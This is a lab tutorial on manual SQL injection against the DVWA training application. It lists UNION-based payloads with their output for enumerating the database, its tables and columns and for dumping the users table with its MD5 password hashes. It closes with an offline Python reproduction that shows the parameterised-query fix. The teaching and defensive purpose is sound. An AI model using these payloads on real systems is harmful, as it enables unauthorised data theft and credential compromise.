Once the virtual machine has been downloaded and started, a screen like the following should appear.
(Screenshot: virtual machine running)
To reach the virtual machine from a browser, note the IP address it was assigned and open http://192.168.56.101/login.php
(Screenshot: DVWA login screen)
Once logged in, follow steps 7, 8 and 9 of lesson 6 of the SQL injection manual.
Step 7.
The login credentials are: Username: admin Password: password
Step 8.
Change the "DVWA Security" level from high to low and click "Submit". At the low level the application splices the User ID value straight into the query without any filtering, which is what the examples below rely on.
(Screenshot: DVWA Security)
Step 9.
Manual SQL injection (the "SQL Injection" page)
(Screenshot: SQL Injection)
Basic SQL injection modes.
Example 1, type 1 in "User ID:" and press "Submit".
(Screenshot: result of entering 1)
The value typed into the form is inserted directly into the SQL statement that the PHP code builds (this is the query from DVWA's low-security source):
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
Example 2, always true: %' or '0'='0
The intent of this input is to make the WHERE clause true for every row, so that every user is returned instead of one.
%' will most likely match no user_id, so that comparison is false.
'0'='0 is always true, because 0 is always equal to 0; false OR true is true, so every row passes the filter. The input's leading quote closes the opening quote of the application's query, and the application's own closing quote completes the final '0' literal, which is why no comment marker is needed here.
SQL statement.
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
(Screenshot: result of %' or '0'='0)
Example 3, database version. %' or 0=0 union select null, version() #
ID: %' or 0=0 union select null, version() #
First name: admin   Surname: admin
First name: Gordon  Surname: Brown
First name: Hack    Surname: Me
First name: Pablo   Surname: Picasso
First name: Bob     Surname: Smith
First name:         Surname: 5.5.44-0+deb8u1
The or 0=0 keeps every row of the original query and the UNION appends one more row whose Surname field holds the MySQL version, 5.5.44-0+deb8u1. The null in the first column is required because a UNIONed SELECT must return the same number of columns (two) as the original query; the # comments out the application's trailing quote.
Example 4, database user. %' or 0=0 union select null, user() #
ID: %' or 0=0 union select null, user() #
First name: admin   Surname: admin
First name: Gordon  Surname: Brown
First name: Hack    Surname: Me
First name: Pablo   Surname: Picasso
First name: Bob     Surname: Smith
First name:         Surname: dvwa@localhost
In the same way as the version, the UNION row shows the MySQL account the application uses to connect to the database, dvwa@localhost. This is the database login, not the operating-system user running PHP; every query injected through the page runs with exactly the privileges of that account, so an over-privileged application account (for example one holding FILE) turns an injection into far more than a data leak.
Example 5, database name. %' or 0=0 union select null, database() #
ID: %' or 0=0 union select null, database() #
First name: admin   Surname: admin
First name: Gordon  Surname: Brown
First name: Hack    Surname: Me
First name: Pablo   Surname: Picasso
First name: Bob     Surname: Smith
First name:         Surname: dvwa
The name of the current database is dvwa.
Example 6, list every table visible through information_schema.tables
%' and 1=0 union select null, table_name from information_schema.tables #
Here and 1=0 makes the original WHERE clause false for every row, so only the rows added by the UNION come back, which is easier to read than the or 0=0 form. The list covers every schema the dvwa account can see, not just information_schema:
ID: %' and 1=0 union select null, table_name from information_schema.tables #
First name: (empty on every row, the null column) Surname: one table name per row:
CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, ENGINES, EVENTS, FILES, GLOBAL_STATUS, GLOBAL_VARIABLES, KEY_COLUMN_USAGE, PARAMETERS, PARTITIONS, PLUGINS, PROCESSLIST, PROFILING, REFERENTIAL_CONSTRAINTS, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, SESSION_STATUS, SESSION_VARIABLES, STATISTICS, TABLES, TABLESPACES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, INNODB_BUFFER_PAGE, INNODB_TRX, INNODB_BUFFER_POOL_STATS, INNODB_LOCK_WAITS, INNODB_CMPMEM, INNODB_CMP, INNODB_LOCKS, INNODB_CMPMEM_RESET, INNODB_CMP_RESET, INNODB_BUFFER_PAGE_LRU (the information_schema tables)
guestbook, users (the two tables of the dvwa database)
Example 7, list the tables whose name starts with "user"; the users table is where the passwords are stored.
SQL statement: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Tables whose name starts with "user" (LIKE is case-insensitive under MySQL's default collation, so USER_PRIVILEGES matches as well as users):
ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
First name:   Surname: USER_PRIVILEGES
First name:   Surname: users
Example 8, list the columns of the users table through information_schema.columns
SQL statement: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
concat joins the table name and the column name with 0x0a (a line feed) so that both fit in the single Surname field. The columns identified are user_id, first_name, last_name, user, password and avatar.
ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
First name:   Surname: users user_id
First name:   Surname: users first_name
First name:   Surname: users last_name
First name:   Surname: users user
First name:   Surname: users password
First name:   Surname: users avatar
Example 9, dump the contents of the users table
SQL statement:
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Result of the query: every field is returned, including the password column. The four values arrive packed into the Surname field, separated by line feeds:
ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
First name   Last name   User      Password
admin        admin       admin     5f4dcc3b5aa765d61d8327deb882cf99
Gordon       Brown       gordonb   e99a18c428cb38d5f260853678922e03
Hack         Me          1337      8d3533d75ae2c3966d7e0d4fcc69216b
Pablo        Picasso     pablo     0d107d09f5bbe40cade3de5c71e9e9b7
Bob          Smith       smithy    5f4dcc3b5aa765d61d8327deb882cf99
The password column holds unsalted MD5 hashes rather than plaintext: 5f4dcc3b5aa765d61d8327deb882cf99 is MD5("password"), the credential used in step 7, and admin and smithy share the same hash, so they share the same password. Unsalted MD5 offers no real protection once the table has been dumped.
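As an added example (not code from the page or from DVWA itself), the following Python script reproduces the low-security query construction against an in-memory SQLite table, so the whole chain above, the tautology, UNION-based enumeration, the dump and finally the parameterised fix, can be run offline. SQLite has no information_schema, version() or # comments, so the script assumes sqlite_master, sqlite_version() and the -- comment marker as stand-ins for the MySQL forms used on the page; the sample rows are constructed from the dump shown above.

```python
import hashlib
import sqlite3

# Added example, not code from the page or from DVWA. It reproduces the DVWA
# "low" query construction against an in-memory SQLite table so it runs
# offline. The rows are constructed from the dump shown on the page; SQLite
# has no information_schema, version() or '#' comments, so the payloads use
# sqlite_master, sqlite_version() and '-- ' in their place (assumptions).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
    (3, "Hack", "Me", "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    (4, "Pablo", "Picasso", "pablo", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    (5, "Bob", "Smith", "smithy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]


def make_db():
    """Build the stand-in schema: DVWA's users and guestbook tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT)"
    )
    conn.execute("CREATE TABLE guestbook (comment_id INTEGER, comment TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """The page's $getid query: user input spliced straight into the SQL text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    """Same query with a bound parameter; the input can never become SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def enumerate_tables(conn):
    """Example 6 adapted: 'and 1=0' drops the real rows, UNION appends table names."""
    payload = "%' and 1=0 union select null, name from sqlite_master where type='table' -- "
    return sorted(row[1] for row in vulnerable_lookup(conn, payload))


def dump_users(conn):
    """Example 9 adapted: pack four columns into one field with '||' and char(10)."""
    payload = (
        "%' and 1=0 union select null, "
        "first_name || char(10) || last_name || char(10) || user || char(10) || password "
        "from users -- "
    )
    rows = []
    for _, packed in vulnerable_lookup(conn, payload):
        first, last, login, pw_hash = packed.split("\n")  # undo the 0x0a packing
        rows.append((first, last, login, pw_hash))
    return sorted(rows)


def is_unsalted_md5(candidate, hexdigest):
    """DVWA stores unsalted MD5; a guess is confirmed by hashing it and comparing."""
    return hashlib.md5(candidate.encode()).hexdigest() == hexdigest


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1"))                 # intended use: one row
    print(vulnerable_lookup(db, "%' or '0'='0"))      # tautology: every row
    print(vulnerable_lookup(db, "%' and 1=0 union select null, sqlite_version() -- "))
    print(enumerate_tables(db))
    for row in dump_users(db):
        print(row)
    print(safe_lookup(db, "%' or '0'='0"))            # parameterised: no rows
    print(is_unsalted_md5("password", SAMPLE_USERS[0][4]))
```

Run it as a script to see each stage printed in turn. The design point is in the last two calls: the bound-parameter version of the same query returns nothing for the tautology payload, because the value is sent to the engine as data rather than concatenated into the statement text, and the hash check shows why dumping an unsalted MD5 column is equivalent to dumping the passwords for any value found in a wordlist.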